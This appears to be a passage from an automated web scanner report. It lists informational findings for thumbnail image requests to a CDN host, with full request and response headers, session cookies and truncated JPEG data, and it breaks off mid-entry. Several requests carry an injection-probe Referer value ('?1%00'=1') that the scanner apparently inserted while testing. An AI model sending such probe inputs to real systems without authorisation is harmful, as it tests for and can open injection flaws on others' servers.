7.280. http://lilypad-cdn.cranberry.com/img/03de784d-7023-4738-b047-322e3d5d9b82/60/myrtle-beach-seo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/03de784d-7023-4738-b047-322e3d5d9b82/60/myrtle-beach-seo.jpg

Request

GET /img/03de784d-7023-4738-b047-322e3d5d9b82/60/myrtle-beach-seo.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=5cc1891ff06e951c78fba8003ae204ef; path=/
Content-Length: 1386
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.281. http://lilypad-cdn.cranberry.com/img/07bf76c7-ed08-4604-8bff-2d07e9fe3ff1/60/robleroy.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/07bf76c7-ed08-4604-8bff-2d07e9fe3ff1/60/robleroy.jpg

Request

GET /img/07bf76c7-ed08-4604-8bff-2d07e9fe3ff1/60/robleroy.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=17e53ffd9c04692f564fb5de03b4d3ca; path=/
Content-Length: 1680
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.282. http://lilypad-cdn.cranberry.com/img/0a9d4a79-d7b5-4478-98f6-6f2c3d4acd38/60/shonaliburke.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/0a9d4a79-d7b5-4478-98f6-6f2c3d4acd38/60/shonaliburke.jpg

Request

GET /img/0a9d4a79-d7b5-4478-98f6-6f2c3d4acd38/60/shonaliburke.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=5783b859a7756b02b49db79586635130; path=/
Content-Length: 1553
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.283. http://lilypad-cdn.cranberry.com/img/0cc45e76-631e-4b23-98d6-2ec114702e80/60/instockkitchens.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/0cc45e76-631e-4b23-98d6-2ec114702e80/60/instockkitchens.jpg

Request

GET /img/0cc45e76-631e-4b23-98d6-2ec114702e80/60/instockkitchens.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=f44ba8f9495b62bef052a7f6afd83e18; path=/
Content-Length: 1099
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.284. http://lilypad-cdn.cranberry.com/img/0fb42f46-697b-4368-abb4-474a56905435/60/hunzasoft.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/0fb42f46-697b-4368-abb4-474a56905435/60/hunzasoft.jpg

Request

GET /img/0fb42f46-697b-4368-abb4-474a56905435/60/hunzasoft.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=2d11bad93008d67aba0e92da2dd1f1c6; path=/
Content-Length: 1570
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.285. http://lilypad-cdn.cranberry.com/img/0fffbfc2-8a18-4a22-bda7-3e674a585bc5/60/pigblimp.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/0fffbfc2-8a18-4a22-bda7-3e674a585bc5/60/pigblimp.jpg

Request

GET /img/0fffbfc2-8a18-4a22-bda7-3e674a585bc5/60/pigblimp.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=26004cc1dbc66eb04c70639cdea780a9; path=/
Content-Length: 1977
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.286. http://lilypad-cdn.cranberry.com/img/124b12f2-5eb0-4738-885a-3e4162420fee/60/emedicalmedia.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/124b12f2-5eb0-4738-885a-3e4162420fee/60/emedicalmedia.jpg

Request

GET /img/124b12f2-5eb0-4738-885a-3e4162420fee/60/emedicalmedia.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=7fb8f879e592702c17fd8e2a5d2112ff; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.287. http://lilypad-cdn.cranberry.com/img/16a566bf-a072-4f93-825d-045768ad5b6e/60/frankmlamark.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/16a566bf-a072-4f93-825d-045768ad5b6e/60/frankmlamark.jpg

Request

GET /img/16a566bf-a072-4f93-825d-045768ad5b6e/60/frankmlamark.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=84ddccb306b25d200d364eaa27981053; path=/
Content-Length: 1597
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.288. http://lilypad-cdn.cranberry.com/img/1b5d13c6-263b-4045-85ed-8b94e1f0239c/60/sdmackpictures.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/1b5d13c6-263b-4045-85ed-8b94e1f0239c/60/sdmackpictures.jpg

Request

GET /img/1b5d13c6-263b-4045-85ed-8b94e1f0239c/60/sdmackpictures.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=3b0020998d698f4fae4872e03b65fe8e; path=/
Content-Length: 1614
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.289. http://lilypad-cdn.cranberry.com/img/21e8fb5b-3438-4c59-93f7-af82f5a3ab19/60/listdummy.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/21e8fb5b-3438-4c59-93f7-af82f5a3ab19/60/listdummy.jpg

Request

GET /img/21e8fb5b-3438-4c59-93f7-af82f5a3ab19/60/listdummy.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=3961c1bc4a0d14c7138519acaed0a9de; path=/
Content-Length: 1718
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.290. http://lilypad-cdn.cranberry.com/img/25adef58-6895-4904-be32-3ad23f6c239f/60/caryburch.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/25adef58-6895-4904-be32-3ad23f6c239f/60/caryburch.jpg

Request

GET /img/25adef58-6895-4904-be32-3ad23f6c239f/60/caryburch.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=01c5d04f338d44ee24d107fb31001363; path=/
Content-Length: 1496
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.291. http://lilypad-cdn.cranberry.com/img/299ddeec-d45a-47fd-b8d6-75554fd1d278/60/itnmark.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/299ddeec-d45a-47fd-b8d6-75554fd1d278/60/itnmark.jpg

Request

GET /img/299ddeec-d45a-47fd-b8d6-75554fd1d278/60/itnmark.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=9702f0b79c8a9c3448e4eb1ab1cd822b; path=/
Content-Length: 1203
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.292. http://lilypad-cdn.cranberry.com/img/3f0130a1-6fc9-4d39-9cd1-7229268a9d72/60/robertouimet.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/3f0130a1-6fc9-4d39-9cd1-7229268a9d72/60/robertouimet.jpg

Request

GET /img/3f0130a1-6fc9-4d39-9cd1-7229268a9d72/60/robertouimet.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=6dba82fd50ae10a65c026ff18f37c5bd; path=/
Content-Length: 1586
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.293. http://lilypad-cdn.cranberry.com/img/478ce290-40ff-4cb7-b7cc-04603d027cba/60/katybarrilleaux.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/478ce290-40ff-4cb7-b7cc-04603d027cba/60/katybarrilleaux.jpg

Request

GET /img/478ce290-40ff-4cb7-b7cc-04603d027cba/60/katybarrilleaux.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=781ed020eb1af00d4d0012b976041d86; path=/
Content-Length: 1608
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.294. http://lilypad-cdn.cranberry.com/img/480bfcaa-6f10-466b-9a60-632362fc4ff4/60/jmcdaid.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/480bfcaa-6f10-466b-9a60-632362fc4ff4/60/jmcdaid.jpg

Request

GET /img/480bfcaa-6f10-466b-9a60-632362fc4ff4/60/jmcdaid.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=db830eea80ded39ee4375ebd75ddefc0; path=/
Content-Length: 1731
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.295. http://lilypad-cdn.cranberry.com/img/4df7f1a4-4e91-4d74-a4b5-043a1442e4f5/60/simusync.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/4df7f1a4-4e91-4d74-a4b5-043a1442e4f5/60/simusync.jpg

Request

GET /img/4df7f1a4-4e91-4d74-a4b5-043a1442e4f5/60/simusync.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=098b7b23391f02b6eee7b80080b1a89b; path=/
Content-Length: 1235
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.296. http://lilypad-cdn.cranberry.com/img/53b69f73-b55b-4427-ad9e-2075ed70a265/60/cmcmediagroup.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/53b69f73-b55b-4427-ad9e-2075ed70a265/60/cmcmediagroup.jpg

Request

GET /img/53b69f73-b55b-4427-ad9e-2075ed70a265/60/cmcmediagroup.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=ab670beebe3ccfcbc83172be37cb70bb; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.297. http://lilypad-cdn.cranberry.com/img/6178b5ca-4f23-47b3-9483-668b0818d178/60/bryaneisenberg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/6178b5ca-4f23-47b3-9483-668b0818d178/60/bryaneisenberg.jpg

Request

GET /img/6178b5ca-4f23-47b3-9483-668b0818d178/60/bryaneisenberg.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=671db5502e3defc8472a91d26254e198; path=/
Content-Length: 1440
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.298. http://lilypad-cdn.cranberry.com/img/67bcf2f6-5919-4a34-a7b3-5a7e05e2d519/60/truxperts.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/67bcf2f6-5919-4a34-a7b3-5a7e05e2d519/60/truxperts.jpg

Request

GET /img/67bcf2f6-5919-4a34-a7b3-5a7e05e2d519/60/truxperts.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=ccb61f387d6204bfb210115733009312; path=/
Content-Length: 1625
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.299. http://lilypad-cdn.cranberry.com/img/69c3eb8a-3fd9-41f4-afef-279eaeb48289/60/technologycafe.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/69c3eb8a-3fd9-41f4-afef-279eaeb48289/60/technologycafe.jpg

Request

GET /img/69c3eb8a-3fd9-41f4-afef-279eaeb48289/60/technologycafe.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
